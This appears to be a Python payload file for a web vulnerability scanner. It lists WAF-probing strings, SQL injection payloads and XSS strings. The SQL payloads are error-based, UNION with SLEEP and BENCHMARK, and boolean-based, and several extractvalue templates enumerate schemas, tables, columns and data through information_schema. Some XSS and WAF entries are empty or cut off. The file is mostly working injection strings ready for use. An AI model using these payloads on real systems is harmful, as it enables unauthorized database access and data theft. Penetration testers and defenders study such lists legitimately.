waf_checker = [ " '",
" AND 1",
" /**/AND/**/1",
" AND 1=1",
" AND 1 LIKE 1",
" ' AND '1'='1",
"
",
"![]()
",
""
]
Sql_injection = {
"error_based" : ["'", "')", "';", '"', '")', '";', '`', '`)',
'`;', '\\', "%27", "%%2727", "%25%27", "%60", "%5C"],
"union_query" : [" UNION ALL SELECT 1,2,3,4",
" UNION ALL SELECT 1,2,3,4,5-- ",
" UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5",
" UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- ",
" AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- ",
" UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--",
],
"boolean_based" : [ " AND 1=0",
"' AND '1'='1",
"' AND 1=1--",
" ' AND 1=1#",
" AND 1=1 AND '%'='",
" AND 7300=7300 AND 'pKlZ'='pKlZ",
" AS INJECTX WHERE 1=1 AND 1=1--",
" ORDER BY 2--",
" RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
" %' AND 8310=8310 AND '%'='",
" and (select substring(@@version,1,1))='X'",
" and (select substring(@@version,3,1))='S'",
" AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-",
" AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--",
" AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--",
" AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--",
" AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--",
" AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--"
]
}
XSS = ["z",
"[confirm``]\"<\">z",
"z",
"",
"